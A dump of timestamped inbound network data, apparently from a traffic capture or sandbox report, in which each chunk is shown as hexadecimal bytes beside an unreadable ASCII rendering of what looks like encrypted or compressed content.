                                                                                                                                                  2022-11-15 17:54:38 UTC3787INData Raw: 85 04 be e3 30 b3 74 af d8 ee e9 9a 7a 9f 57 b2 ed 46 7f 51 32 dd d1 c0 b2 2a 0c 35 71 09 16 f7 8d cf 3a a8 f6 cb c8 41 cd 09 3c 24 7d 97 e5 41 2d ce 4d 82 6f 89 91 64 5f 5e 0d a3 74 40 74 25 b5 94 cd eb 6e fc 74 a4 ef b9 cb 4b fd 8a d3 ba 2c d6 66 a1 e7 0d 7b ac 9c c1 01 e9 30 11 2e b8 d3 a8 33 12 1f 39 18 61 19 31 c6 3e d9 04 78 db 85 29 ff eb d8 f4 fb 90 21 95 f0 f9 9d e6 c9 bd d9 c3 e5 f7 fb a2 b6 92 14 c9 9a b2 bf d5 65 ba b2 d9 e6 df d1 f9 64 ee be bc 58 b4 af 85 be a8 11 b2 cb 99 f2 e3 ce d4 8b 59 cf 3c af 89 db d7 f3 83 27 75 cc e1 a6 2e d3 2e eb a1 b2 3d 96 88 f7 48 a8 cb 52 0c b6 36 15 04 52 df 9f f8 92 e3 a8 06 b0 29 d3 05 a4 d6 28 21 d7 d8 52 b8 88 16 03 32 ef 8d 17 01 71 01 d3 3e dc a2 6c 01 cc 99 47 09 fb 21 df 3a ae 21 fd 0d 20 7d db da b6
                                                                                                                                                  Data Ascii: 0tzWFQ2*5q:A<$}A-Mod_^t@t%ntK,f{0.39a1>x)!edXY<'u..=HR6R)(!R2q>lG!:! }
                                                                                                                                                  2022-11-15 17:54:38 UTC3803INData Raw: af a0 5a f1 4b a7 e1 df c8 6e 30 54 fe 89 ca bd d9 b3 6b 74 33 67 fe 84 ef fe a2 4e 85 05 08 01 13 de 09 ff be 6a f6 be 2d b8 7c 11 58 89 d9 9f d3 b2 b0 8c df 31 f8 95 7b 5b 2c 3e 62 09 f1 63 49 4f 3e 75 56 cc be 03 62 1a 20 21 d0 93 20 d2 ff d9 6e 01 31 d8 09 1a b8 2e e2 79 99 5f e6 2b f2 a6 d2 ea 30 53 32 dd a0 74 4f 4a 0d bb cd 50 7f 13 1b ea 72 ff 0d f7 51 32 49 e2 fb 5f 78 94 d2 a2 8b 52 26 c7 75 65 cf a3 84 4a bc 6d 4a f3 44 5f bc 1f 2f fa df b2 d4 0b e4 7e 35 5a 79 e0 4b 56 35 65 ff f1 b7 32 5d 93 c2 ed f2 57 7e ff 7a 89 09 b0 4e 33 02 bf 54 54 cb dd 96 a8 9d 5f b2 7b 78 0a bd 1a fa 46 4c 5c 03 b6 97 ce b6 12 f1 28 b2 a4 92 fb 72 9a c9 cc 03 25 29 f9 b1 19 f6 2e b7 f5 27 b9 7c 7a 62 09 f2 57 30 1b e9 40 96 76 e0 05 77 41 a2 58 29 3c 69 34 de 3e 52
                                                                                                                                                  Data Ascii: ZKn0Tkt3gNj-|X1{[,>bcIO>uVb ! n1.y_+0S2tOJPrQ2I_xR&ueJmJD_/~5ZyKV5e2]W~zN3TT_{xFL\(r%).'|zbW0@vwAX)<i4>R
                                                                                                                                                  2022-11-15 17:54:38 UTC3819INData Raw: 32 ec 00 46 8e 06 d2 24 e1 31 3f 53 da b9 69 2f 12 5d 77 1f e1 95 f8 46 81 38 51 c6 b9 02 e7 60 59 b5 09 b6 14 3f e1 00 85 75 18 31 1a 91 40 0c 5f 8b 4c 6e 62 10 50 a8 49 40 f3 87 52 0e e3 94 44 2b 02 86 9c 95 81 99 72 b4 9d a7 75 48 0f a3 b5 60 a1 62 90 95 58 f1 92 b9 32 dc fe 24 bb 80 37 72 c9 d3 6b 13 75 f0 fb 80 2c 8e f7 a6 c1 cb 8c a9 77 6b 48 a1 eb 00 10 c3 25 95 63 23 2d 36 4e 9d a2 b6 2f bc 60 cc cc 99 03 0c 9b 6a e1 2c 69 d6 25 cc 46 b8 25 8b 00 a4 fd dc c0 24 3f 36 20 dd c5 22 01 43 8e 59 b9 7a 34 6d 34 0a e7 a2 cf 75 74 8f fb b4 46 57 3c 2c 04 5d 97 85 13 05 55 f8 5e f6 80 16 01 a7 18 b4 3c 83 e2 3b 7b 65 48 8f ce 21 20 52 40 dc 27 ca 13 84 e9 ff 4f 3c 0f 55 fb 57 e0 04 97 1a cb ab 86 01 6a 3b 76 74 30 51 20 fa 3a 5e 63 18 18 fb d8 30 62 3f 1a
                                                                                                                                                  Data Ascii: 2F$1?Si/]wF8Q`Y?u1@_LnbPI@RD+ruH`bX2$7rku,wkH%c#-6N/`j,i%F%$?6 "CYz4m4utFW<,]U^<;{eH! R@'O<UWj;vt0Q :^c0b?
                                                                                                                                                  2022-11-15 17:54:38 UTC3835INData Raw: 12 0b f6 26 34 51 e2 af f6 76 b0 1e eb 68 e5 95 5d 13 cf 92 ce 74 8d 12 d9 fb 74 2b b2 0e 84 31 ce be ad c8 d0 ae d7 8b 92 22 15 9f 0f f0 69 3a 18 16 01 ef b0 1e 9d 7f b2 81 7d 59 75 48 c3 c3 9d d2 84 ec de a4 ea bc 98 bd 2e eb 28 78 37 95 f5 9d c2 1c 15 38 46 08 5b 89 18 6f 17 af 29 ac a7 ed 5d ba 4d 7e 0d 0b ce 24 4e c5 bd 74 59 ee 4b 7f d7 ba 4b 75 f6 e9 c9 5f c6 1b 4e b8 b2 7c 84 21 ca aa 67 e6 89 55 ea 99 d5 c6 96 f8 04 93 3d 23 d1 34 e2 f6 d9 44 77 03 5a 1f fa 30 80 f8 31 da 80 3a b6 05 ad 12 01 fe 2d ee e3 6f 2a f2 27 5a c2 2d bc 11 77 31 c6 38 21 9d d6 1f 8d b8 f6 55 45 ed a7 89 c3 f1 67 96 d9 81 71 e6 24 7b 29 a6 31 41 51 d7 ce 04 4b a5 6b 38 56 7c 72 12 af 7d d9 cd ed 5c 6f 09 a9 c8 09 91 51 8f a4 21 a5 56 7f 3e 2f ee d1 28 49 55 7b 86 18 e2 30
                                                                                                                                                  Data Ascii: &4Qvh]tt+1"i:}YuH.(x78F[o)]M~$NtYKKu_N|!gU=#4DwZ01:-o*'Z-w18!UEgq${)1AQKk8V|r}\oQ!V>/(IU{0
                                                                                                                                                  2022-11-15 17:54:38 UTC3843INData Raw: 81 03 1e 39 19 31 49 6f 28 a6 09 4b f7 bb 8e ab 6b 7a 7b 6a 3b 27 1c e5 13 a8 3c bc 7d ea 32 27 c5 b0 a7 d6 6a 25 65 aa 2f 7f 31 16 02 61 39 97 85 e9 ea 2c ab bb 95 f9 c3 6b 58 7c 9f 16 f0 d6 03 8a f4 49 47 9d 91 04 12 21 de ab cb 57 4e ec 5b 25 02 45 07 08 ef 40 af 70 9f 4b ea ca bb 79 f5 39 45 81 ea 31 df b9 f6 5c 21 5a 4a be 16 a2 45 20 a4 3c e5 ca 30 25 77 6e 0a 9d bb c0 dc ce dc 2f e1 db 7a 93 66 ad 59 8a ea 2c 96 d2 b0 20 c9 04 2d 75 fa 0d 37 85 f0 a8 72 b4 44 bb ca 24 a2 cb 80 66 31 07 b9 eb 14 4f 0d 53 89 28 bf 07 ae 7e f6 21 49 0a 96 9e 13 3b dc 3c 08 0d c9 d7 79 1e 4c 2e a8 db a4 11 10 a5 9f 03 02 3c 1d 68 85 d9 9e 2b 31 23 36 66 89 14 d3 dc 55 bc 7a 4b 03 e2 76 96 f0 59 29 fd 6a 75 00 95 78 88 18 29 5e 37 a6 18 29 e7 f0 02 b2 ef 89 d3 55 ec 38
                                                                                                                                                  Data Ascii: 91Io(Kkz{j;'<}2'j%e/1a9,kX|IG!WN[%E@pKy9E1\!ZJE <0%wn/zfY, -u7rD$f1OS(~!I;<yL.<h+1#6fUzKvY)jux)^7)U8
                                                                                                                                                  2022-11-15 17:54:38 UTC3859INData Raw: ff 5a e3 db bb 25 08 14 90 81 f1 1f 64 01 ca bd e5 75 05 31 39 32 55 bd b3 f7 0a 29 93 13 24 f0 b9 a3 f1 0f b7 16 a6 98 dc ac 02 53 fe 8b 48 8a 58 ec a5 ea 76 fb 72 97 d5 b3 35 ba f6 ff 16 7d 90 78 a5 fc be b5 d8 ee b8 63 b1 31 c8 54 95 ea 09 8e 60 c5 bf 96 c7 e8 79 b2 ce fd d9 47 68 42 be 2d e1 d4 a9 52 dc 5a 27 fe 8d 02 de 01 ca 05 71 04 05 0a 29 f8 ea f3 a2 5a a8 c9 4e ca a4 40 84 89 51 0f bf 6f a2 ab d4 ca d4 be 42 13 13 89 f8 d8 2b e9 b5 88 a0 c5 26 49 72 d7 09 3c 73 34 15 35 5c 2b 09 8e 25 7e b3 c4 19 af b8 1c c5 e9 35 52 62 a8 50 5e aa 29 39 23 41 16 33 19 72 5c c2 70 3f 7c d7 4e e6 bb 29 f5 28 dc 89 03 d7 a5 99 f7 cf da 12 ef 24 2c a5 29 4a fe 22 76 21 dd d0 44 2d ea 1f cc e4 82 92 54 77 c4 df e8 2c d7 a8 49 02 29 87 1f eb 51 d7 b2 79 75 a4 46 e2
                                                                                                                                                  Data Ascii: Z%du192U)$SHXvr5}xc1T`yGhB-RZ'q)ZN@QoB+&Ir<s45\+%~5RbP^)9#A3r\p?|N)($,)J"v!D-Tw,I)QyuF
                                                                                                                                                  2022-11-15 17:54:38 UTC3875INData Raw: da 14 d3 42 11 af 40 60 c0 3c 52 ec 01 9a 03 91 05 a3 23 20 94 b9 00 4b 13 19 ab 70 dd f3 a4 f0 dc 4e d8 ee d1 9b c3 67 38 69 b2 fa c5 31 84 3e 39 3a ea a9 b0 a2 e8 0b c6 2e fe 16 84 5d c3 cb d2 ba cb 72 04 e9 33 10 39 af a2 99 d3 b8 1f 4e bb 9a 98 5b ca df 88 06 52 da 80 9d 5b 66 45 18 52 1a ba 17 cf c2 00 33 23 03 b9 84 43 bf 21 e2 ea 04 d4 29 72 dd d9 ca 93 38 f8 0a 5f 75 30 aa 2a df 4f 33 62 1a 22 95 31 ef 10 bd 38 cc 65 48 44 bf 69 8d 7f e7 fa 4b fc 88 c5 09 0a ae 88 5b b9 af 4b 10 08 cd 0a ca 6e e5 01 6e b3 f9 5b e7 26 89 31 51 fc 44 33 be 16 fb f3 4a 9a 1c 75 dc 03 53 e2 e2 75 45 33 ae 1c 2c fd 27 45 e5 b4 69 ad 8d c4 c6 14 af 28 d0 ba 4b 01 e2 25 92 aa b3 a1 4b 04 00 31 da ab b9 1f 9a e4 57 5b b1 8b 03 06 dc 75 c9 dd 53 7d 2f 64 f5 ed a7 1c 74 22
                                                                                                                                                  Data Ascii: B@`<R# KpNg8i1>9:.]r39N[R[fER3#C!)r8_u0*O3b"18eHDiK[Knn[&1QD3JuSuE3,'Ei(K%K1W[uS}/dt"
                                                                                                                                                  2022-11-15 17:54:38 UTC3891INData Raw: 29 37 4c 2a 1c 30 02 ef 6d fe 09 ff 06 55 77 7d 98 d2 8f f3 03 0a c4 64 18 e4 2a 09 46 e2 bb 91 e3 05 eb 49 e0 ff f9 69 c0 34 f0 d6 0c f3 50 c1 45 77 31 fa ff e4 98 70 00 04 68 b8 11 cf 12 c6 a3 27 c2 e3 83 0f 3c 25 09 34 72 2d f4 c0 e3 c7 ad 8c a0 4e c5 0f 60 f0 20 0a c8 d4 32 60 1b 2c 67 ce 49 22 31 f4 1d 28 01 9c 2e fd 9d 98 bc ec d2 df b0 81 0a 02 c6 c9 4d 80 30 b1 ad 44 6c 0e 7a 80 a8 e6 97 62 f7 21 20 2e 53 93 e4 fc 42 0c 34 79 f8 1e 18 1b 51 cb 36 8b 10 f9 23 00 26 d7 54 2a 5c 03 fe 9c 80 70 f5 5b 0d 20 c0 30 9d 91 80 10 40 0c cd ff 44 d1 03 e2 5f b6 5e c5 39 13 50 1a 69 af f6 e4 21 3d 69 69 a1 a7 68 19 84 4f 6e e4 3b 1c b5 de c3 db 2d 08 f9 02 77 36 6d d7 79 19 03 aa c1 02 1a 00 0c 79 b5 ab 48 ba 2c 04 a9 3c d7 e1 43 51 2a 51 e5 fa d0 89 01 ad b3
                                                                                                                                                  Data Ascii: )7L*0mUw}d*FIi4PEw1ph'<%4r-N` 2`,gI"1(.M0Dlzb! .SB4yQ6#&T*\p[ 0@D_^9Pi!=iihOn;-w6myyH,<CQ*Q
                                                                                                                                                  2022-11-15 17:54:38 UTC3907INData Raw: 21 cf 0f 65 f6 bf fe f2 88 db 34 4b 40 ed 67 4e 9e 9c 4c 7c 1e 29 db 92 f6 bf 8a eb 50 0f 0a b7 0b 95 5b 78 b4 86 ef fc 44 dd 89 25 28 d9 41 69 75 9c 87 b5 e6 8f 2d 2b 0b 71 6e 69 7e 64 12 e6 f9 aa d0 dd d0 c7 25 f2 d1 62 97 03 f0 6d 02 9d 32 37 c9 5f c3 7f 09 b2 f7 73 fe 08 c6 60 af 70 ba 4a 0e 98 3c e3 93 57 26 0f 26 71 09 09 d3 32 25 77 59 27 13 d8 be 32 7e 35 a0 36 2e f1 e7 eb 16 64 09 c8 b3 ef 8a 2d 38 4a 13 27 fd 94 e0 95 e6 1d 25 c6 6b d9 01 4a 85 08 31 0e 68 aa 27 ce a6 f0 fe 9f f9 56 97 0f ea 39 1a 7f 25 fe f8 b1 e0 37 fa 43 27 c6 04 3a 47 d4 9b a7 45 6a 9d b6 cb f8 46 f9 b3 c4 6b 57 e0 b1 49 f3 71 b3 32 58 04 3a 73 1b 58 ee 04 f3 29 0e ba f2 ec 25 60 fb d0 bf a5 f7 55 39 86 30 36 a5 13 39 1f b7 ca 2d 07 c5 33 a5 ba b0 14 9b 80 f6 4b 8c 25 a5 52
                                                                                                                                                  Data Ascii: !e4K@gNL|)P[xD%(Aiu-+qni~d%bm27_s`pJ<W&&q2%wY'2~56.d-8J'%kJ1h'V9%7C':GEjFkWIq2X:sX)%`U9069-3K%R
                                                                                                                                                  2022-11-15 17:54:38 UTC3923INData Raw: 9f 07 c6 31 18 24 d6 d9 ee 21 36 69 5e ce bf 16 2d fa 6a 56 39 ef 2d fe d9 04 28 53 a1 05 89 7b 29 de 3e b6 83 4e 82 ba ca df 6c 47 b9 28 9d eb 89 09 9b d4 29 12 80 f2 16 81 21 ff 31 f7 6d a7 de 17 d6 ee cc 4f 31 ed 3f cd f2 3e ba 39 85 19 c4 2f ef 5c 38 97 cb ab 29 9a 38 b3 80 16 23 30 39 33 9d 5e 5c f2 7c 9e 25 3a 21 78 38 e5 7f f2 60 d2 e1 95 2f bc a8 a6 8e 9f 7c ff 5a a9 77 fb 85 a7 30 c4 eb 09 5a de 37 af ab ba 26 76 09 af de e3 13 aa f2 0b d1 5a 62 2e 1b be 55 d1 78 4f 49 ef 74 15 14 3f 39 97 b8 95 12 b2 46 ec 40 24 0a 81 72 75 0b 59 f6 72 16 e6 f2 3d d6 82 97 f6 f7 c5 1b a5 7d 96 11 82 d4 7d f9 5f cb dd 1c 39 96 39 23 ea 12 0f bc f0 a2 37 dc fd 60 9d d3 18 ba 0b 5a 4d f5 2f e5 16 05 ee 29 17 a9 ec e2 06 14 01 29 03 bf 23 86 59 22 7e ce 9f 4b ad dd
                                                                                                                                                  Data Ascii: 1$!6i^-jV9-(S{)>NlG()!1mO1?>9/\8)8#093^\|%:!x8`/|Zw0Z7&vZb.UxOIt?9F@$ruYr=}}_99#7`ZM/))#Y"~K
                                                                                                                                                  2022-11-15 17:54:38 UTC3939INData Raw: c7 cd 8a e1 df 3e af 34 e9 05 6a 8a 19 fa e5 ac 05 34 ae cc 6f d2 80 d5 dc 04 4d 72 01 d8 05 ff 74 92 16 f1 ed e6 84 f2 1f aa 36 2d 23 90 09 85 93 2a 5c 5b f2 eb 29 35 78 33 92 13 b0 fe 17 7f ab 88 0f 35 99 c5 6f c9 fb 57 a9 59 d1 81 88 c2 0a 93 23 ff 09 3f 32 fd 64 67 27 39 0b f5 14 41 9f ee 7f a2 b6 5f f1 86 45 01 c1 42 bd 92 71 32 d8 ff 30 4f b8 9f 23 25 0e ce 90 f6 28 b4 02 a5 16 f7 04 08 ad 4e 37 26 fb 9b 06 78 97 c5 cb 09 09 33 7f e5 aa 25 df 3a 3f 57 45 13 3b 02 31 f3 1b 83 4c d5 d1 ab 4f c2 f7 94 53 f6 51 50 07 b2 04 71 b9 14 29 f6 b3 61 4e b1 95 e1 24 78 ec a2 bf fd e5 e9 b4 aa bf 75 01 ef dc 82 f7 9f e5 a5 a5 46 c7 be da 20 9e b1 1d 4b de b3 13 09 ff 2c 08 21 fd f5 fe 3a 8d 1a 7f cd 3a 6f ed 36 d4 41 51 d9 3f ac 60 3e 09 96 d7 2d 33 95 c7 92 d0
                                                                                                                                                  Data Ascii: >4j4oMrt6-#*\[)5x35oWY#?2dg'9A_EBq20O#%(N7&x3%:?WE;1LOSQPq)aN$xuF K,!::o6AQ?`>-3
                                                                                                                                                  2022-11-15 17:54:38 UTC3955INData Raw: 09 fe d2 18 a8 03 d3 08 36 9d cc 68 3b 09 8f 4c da b4 31 94 09 32 39 98 58 37 09 72 fa a1 ac 77 92 09 8a 4c ac 8f 09 c9 66 85 78 ce 09 1b bd ed 2f 88 14 09 60 9c ec 31 65 09 4c a2 25 74 92 09 e8 c3 94 ed 3c 09 a3 c8 d4 31 a8 09 10 55 99 88 15 09 1a 12 1f 23 b9 e6 33 28 be 09 99 31 39 9e 09 b2 1a 43 a4 b7 33 09 56 79 5b 33 09 bc 19 c1 22 09 c6 44 cb 8f 40 29 94 89 14 53 ec 19 33 09 85 69 8a 12 09 6e 60 0c 14 73 09 43 26 58 28 5c 31 09 34 1f 99 b8 39 09 fc 74 dc 01 ba c8 2e 2e bb bc b1 09 a3 68 56 88 09 28 dd 65 b4 62 e2 09 b1 62 61 44 b6 8d 09 6e e6 81 8c 09 bc b4 68 c1 c5 09 68 bf 0c b4 6d 09 09 9e 9c 18 0e 09 ec ff cc 38 f1 09 a2 96 ec 19 a7 09 f6 98 19 fb 09 6f 91 90 1c 61 74 09 2f 0b 2c b1 e8 09 8e a4 30 1c 93 c6 09 d5 2f 68 65 da 09 76 93 0c 7b 10 09
                                                                                                                                                  Data Ascii: 6h;L129X7rwLfx/`1eL%t<1U#3(19C3Vy[3"D@)S3in`sC&X(\149t..hV(ebbaDnhhm8oat/,0/hev{
                                                                                                                                                  2022-11-15 17:54:38 UTC3971INData Raw: c2 e7 36 25 16 ea 80 c0 cf 05 78 b3 0e aa 4d 7a 3d 06 ef 13 1e 19 49 06 d4 24 71 fc 6e 10 fe c0 0c 25 5b 59 68 18 7a 7d 99 4f 0c a4 46 2a 0c e2 d1 1e e0 5d 50 e0 af 0d 68 e8 6a 01 11 80 2c 1f d1 95 72 3c b6 77 1b 06 ec 73 f3 af e5 39 00 0d 69 7e 0b ed 6f eb 13 a0 30 dc f7 13 fb ff 3b a9 9e 01 a3 a4 b1 4e 77 88 98 22 c9 16 fc d1 4e 51 f0 76 be 09 5b 28 4d 50 dc 1e 40 a5 d2 4b 4c 01 a9 cb b6 1a 5d b5 0a 2c 89 38 31 a7 ef 7c c2 ce 50 b7 8e 1e 22 de 10 93 3e ac 76 d8 04 16 85 b0 0b dd 34 05 69 8a 9b fe 8d 77 e4 54 cd 07 f9 3d 4c c1 6b 4c 75 1a 30 d0 01 45 2f f8 ed 67 5b 0c 67 96 7c 22 17 3b 21 04 fb 66 24 18 03 72 8a 45 c9 27 87 0d 62 f6 fa f7 83 80 28 57 ca 5a 3e a1 58 31 be 3d 3b d6 93 40 25 ae f6 1b 06 07 25 f5 ff 65 7b 00 8d e8 fa e3 1d 6e 0c f6 a1 ac cd
                                                                                                                                                  Data Ascii: 6%xMz=I$qn%[Yhz}OF*]Phj,r<ws9i~o0;Nw"NQv[(MP@KL],81|P">v4iwT=LkLu0E/g[g|";!f$rE'b(WZ>X1=;@%%e{n
                                                                                                                                                  2022-11-15 17:54:38 UTC3987INData Raw: f7 29 d6 de 52 fb ef ad 71 cf 9f 05 e5 45 1a 2e 59 69 dc 2f 92 49 eb 60 11 c1 25 43 3b 97 3f 58 85 5a 8a 45 69 78 df c5 1b 2d c1 47 c3 45 ec dd 7d 6a 04 8d 31 08 b8 5d a2 03 dc f9 4b df e2 e2 f7 be 8a 0e 33 3b 63 08 37 dd ae 45 ce e0 9a e9 b3 4f 89 c1 7b 39 d8 08 11 01 11 2e b1 f9 ad 36 7e fc 4d 32 73 62 cb fb 5c ec e0 2b 16 39 13 24 31 fe 5b c9 77 39 4a f1 52 07 05 57 9a 90 7d d4 68 64 c0 c5 7a ef e3 53 2a c2 68 21 ef 24 12 12 a0 f1 c2 4c 0a 0e b2 b9 fd 45 06 2d c2 ee 5f 09 db 76 4f 49 14 b3 05 33 32 31 f3 25 8d 93 6e b2 e6 92 aa 74 f4 aa c8 46 33 4b 30 1e 4d 94 01 32 b4 b8 a9 c4 29 f3 ba cc 03 eb c4 0b 80 31 c6 91 3a 4b c3 fa 2c ab e3 b7 5b d3 00 22 2e 4b d4 5c 01 5b db e7 6e 0f 31 cf 66 ab 33 db f0 3d ca fa 62 8d ba f7 99 94 3f 59 ad 7f a0 17 c3 5c fa
                                                                                                                                                  Data Ascii: )RqE.Yi/I`%C;?XZEix-GE}j1]K3;c7EO{9.6~M2sb\+9$1[w9JRW}hdzS*h!$LE-_vOI321%ntF3K0M2)1:K,[".K\[n1f3=b?Y\
                                                                                                                                                  2022-11-15 17:54:38 UTC4003INData Raw: 6a 6e f7 f3 7d 84 3a 39 08 bd 89 80 ba ed 58 33 4a 58 8b 54 b1 05 02 2b cd 4b 67 b7 04 01 13 2b 0f af 13 fe f8 11 a4 ab bd 9b 92 f0 c9 e6 b7 71 db c4 6b af 29 d0 31 ee 6e 60 ad d0 cb ee 76 48 e7 7d 68 89 ce 99 07 d6 2a 29 77 ed ce 6f ce dd 5b f7 34 1f f3 dc ef 50 17 8e 4a 9f f0 01 4a d8 ff 35 0f f1 6d 36 2a 5f 1f 66 97 fb a9 06 92 aa e1 c7 2b ec 49 46 4a 76 89 ee 3f bd 02 d3 bc cb 5b e1 ab 6b a9 81 96 e8 f2 b5 ef dc b9 80 b9 d8 89 09 f6 77 33 52 c4 a7 cf 27 1a 67 74 20 82 19 29 de 21 8c d6 2a 34 6a ff 7d 5f e1 33 6b b9 82 d2 34 4a ba c2 7d 1c ba 0e b1 05 eb 55 5c aa cc 57 35 a9 25 c8 61 9b d1 d7 6f d9 63 2f 31 16 c1 b8 14 85 f5 8e c5 2d c7 5c 7f 5b a2 24 76 a5 65 ce 13 19 34 d3 fa 0b eb 12 d3 fa 14 c2 34 58 9e 4e c5 94 aa b6 13 5a b2 3c 27 25 45 9e 8b 2b
                                                                                                                                                  Data Ascii: jn}:9X3JXT+Kg+qk)1n`vH}h*)wo[4PJJ5m6*_f+IFJv?[kw3R'gt )!*4j}_3k4J}U\W5%aoc/1-\[$ve44XNZ<'%E+
                                                                                                                                                  2022-11-15 17:54:38 UTC4019INData Raw: bb a6 02 ab 8c 21 83 83 d3 3c d4 ea ed c0 a8 08 0e b5 f0 b3 53 cb e6 59 38 4b 7c 3e 09 c6 28 5c 09 50 b2 be b2 8e b5 fb 69 27 c2 ee 56 86 53 82 11 d7 f3 4d 25 99 b4 cf 7f 99 d3 66 39 5e a8 ed 5e fd 6e 4b cb f7 2c e6 8d 5a 7b 83 26 33 49 7d 59 72 45 19 c4 0f af 62 ed ce 74 b2 c4 ea 80 4f 29 f8 2d 4b 20 29 65 d2 e5 3c a4 92 ac ea 70 c0 01 4f 1a ba 2b cd 5b f8 50 b1 2d 80 3b 28 eb ee a8 31 df c2 ae 42 4f eb a8 06 a1 89 cb 7f a2 e7 d2 63 d9 43 81 4d 58 d3 00 0d 1c 01 cf 04 a1 33 e7 78 ff 9f 44 a3 1e 05 15 f2 af 26 5e 6b 32 61 8e 24 8b d3 a6 c0 22 d5 c3 20 1e 94 0a 94 c0 2d 1f 08 1c bc cc 47 ad 7b 01 5e 9f 83 14 ec 7f 3d e8 35 a3 12 30 08 a9 25 e9 30 22 dd c2 47 dd fb 07 03 f8 de f3 d1 38 7e a0 03 7f 53 fc ff 95 9b 65 dd e2 89 00 78 92 aa 03 ed 80 68 69 1d 1c
                                                                                                                                                  Data Ascii: !<SY8K|>(\Pi'VSM%f9^^nK,Z{&3I}YrEbtO)-K )e<pO+[P-;(1BOcCMX3xD&^k2a$" -G{^=50%0"G8~Sexhi
                                                                                                                                                  2022-11-15 17:54:38 UTC4035INData Raw: 0b 13 25 2a f8 46 33 7e f4 24 00 7c eb 1c 4e 85 24 a4 34 be 78 67 b5 f2 75 7d dd 98 e1 71 da 1e bb 9a 60 4f 54 0a 97 fb 9c b5 07 01 d4 ae 9f 36 63 21 0b 3c e8 c4 81 f5 00 17 5e 54 51 12 25 39 d9 40 f2 28 8e 7b af 03 82 56 aa 27 83 26 b1 49 71 8c dd 0f 12 bc 32 e3 8b 44 40 92 fc 5a b0 b0 e9 9e b9 07 1c 84 61 31 6f 10 b8 c2 54 95 1d 37 a5 24 fe 80 12 25 ae 60 c1 6c 5b a1 6b 16 e8 ca 35 c2 e3 8a 5e f8 7a 65 25 6d b1 77 4c b5 02 4d 3c 42 83 3e 03 43 c0 86 19 34 cd a2 a2 b8 9c 27 fc c0 3d ca 6c 31 b2 6f 22 fb d4 22 b2 00 b7 e1 ee 3b 6d 70 ed 00 27 3c 51 2d 47 69 d0 e4 c0 26 9b 42 e6 f9 ff 00 8c 01 10 51 d2 6e 61 8e 02 22 b3 f1 65 1e 03 e1 29 43 23 88 09 36 94 35 70 9e 05 9a 5e ba cf ae 14 e4 90 c4 aa e9 bc 86 c5 dc a1 00 d0 33 99 70 79 62 02 2f 72 11 a9 75 56
                                                                                                                                                  Data Ascii: %*F3~$|N$4xgu}q`OT6c!<^TQ%9@({V'&Iq2D@Za1oT7$%`l[k5^ze%mwLM<B>C4'=l1o"";mp'<Q-Gi&BQna"e)C#65p^3pyb/ruV
                                                                                                                                                  2022-11-15 17:54:38 UTC4051INData Raw: 68 26 00 d8 c4 5b 32 23 1a a6 d6 0c 27 72 b7 21 44 51 0e 8d c6 39 0a e1 7e 63 2c 8b 83 f8 2b 80 be 76 2e 24 d7 92 94 07 91 05 c8 31 9e 6f 86 d6 1e 3c 60 29 85 09 b1 76 d4 af 20 13 1e bb 7a bf 0b 25 82 fe 4b 70 c0 1b 2b 6a 2d 78 0c 52 6e f0 83 b1 b7 3d 80 27 1f 80 f4 a2 6f 2e 26 ae 05 be 40 2b 5a fe ff 29 2c ad d0 0c 9a c9 62 11 65 ac f8 12 aa 04 01 0a 03 d7 0a 13 93 4b 09 24 67 fd dc f0 5b 2e c0 26 34 02 c1 5c a6 4f 52 7a 0f 25 dd 3b 80 53 bd 57 92 20 26 ce cd 0d 62 ac 18 6f 9f 56 ac a6 1e 00 cc f2 4b 92 c2 55 20 08 23 30 54 12 38 3f 39 de a2 d1 e4 89 00 e5 63 b7 9e c8 8f e6 76 a2 af 91 82 3d c3 94 30 6a e0 5a 5b e9 f3 da 19 e1 d2 c4 26 f8 55 ef 95 66 6c 1f 4b bc f5 9f b2 89 64 ea dc 6e 6b 89 a7 dd 80 18 33 36 8f 47 08 be 4c 8c d8 42 95 f7 5d a0 74 42 5b
                                                                                                                                                  Data Ascii: h&[2#'r!DQ9~c,+v.$1o<`)v z%Kp+j-xRn='o.&@+Z),beK$g[.&4\ORz%;SW &boVKU #0T8?9cv=0jZ[&UflKdnk36GLB]tB[
                                                                                                                                                  2022-11-15 17:54:38 UTC4067INData Raw: 45 c8 fc 62 0f e6 7a 58 41 57 a0 55 07 05 b1 12 8d 1d 67 0f 71 e3 e0 81 cc 68 6f 19 be eb 42 6a 12 10 71 cd 25 62 87 c6 2a f5 50 11 d2 35 75 44 6c 7a 19 01 b7 a0 26 47 d9 38 6c 98 00 d8 0a cc 95 5f 70 98 27 6e a8 f8 60 00 1e d9 63 b9 4a 9a 89 1b 1c d0 5c 01 3f 44 24 5c d7 a0 85 ca 09 88 38 c3 7e ff 62 26 18 27 a7 4a e8 c1 81 3d 22 bf 27 d4 41 76 9d 10 cc 96 16 60 c6 90 ec a4 8b 5f 07 32 4f 1d 0d da 48 02 86 b0 d9 85 44 88 0c 62 89 4c b1 1c 17 2d 11 60 90 7a 75 36 27 57 0a 20 f8 85 11 43 88 d4 ba 60 81 b8 37 87 7f 22 de 06 e9 91 f5 99 10 38 d4 e7 98 a8 8c 6a 33 d7 19 7f 14 f6 a0 dd 34 f2 a5 0c 3a 06 ce 63 35 fe b0 32 07 9e 7b 78 c1 be 66 f7 30 01 86 a8 17 c6 1f 37 22 6a 01 7b 56 04 aa 0c 87 38 f6 9f 5d b9 18 af 1f 32 fc d5 02 fa 73 a6 3e 29 fc 60 a5 2c 5d
                                                                                                                                                  Data Ascii: EbzXAWUgqhoBjq%b*P5uDlz&G8l_p'n`cJ\?D$\8~b&'J="'Av`_2OHDbL-`zu6'W C`7"8j34:c52{xf07"j{V8]2s>)`,]
                                                                                                                                                  2022-11-15 17:54:38 UTC4083INData Raw: 1f 42 9c 28 ae 47 42 72 91 c8 8f 62 6d 3a ef 08 e1 1c 28 53 7b 38 17 30 75 59 a9 d8 87 94 76 63 5e 33 ca 17 00 18 47 31 5d 2d 01 a7 74 6d 62 13 ba ec ea 30 bf 94 1c d1 fc 21 00 3b 10 11 83 ca a1 63 d7 61 cb 8e e9 5d d1 3c fc 12 9a 8b 00 1b 24 c2 1a cf 67 fa 20 4a 81 40 8c 94 30 60 40 f5 a9 8e 8f 74 6d 02 b5 02 5c b5 0d 8f a4 cb b1 d6 03 b0 b0 c7 e0 27 07 2a bf d3 01 97 2e 00 52 32 71 2b 06 39 a5 5f 0e ed ff e7 a0 ae 0d fd f2 df 48 1e 3c 0f c5 d7 17 ac 91 6a 27 09 fc b7 79 03 83 fb 93 9f 00 16 a1 d1 1f ee c8 8c f9 c0 d9 9e 21 fa 25 75 05 52 39 38 dc 4b 90 0e b7 85 16 b1 dc 02 14 7d c4 70 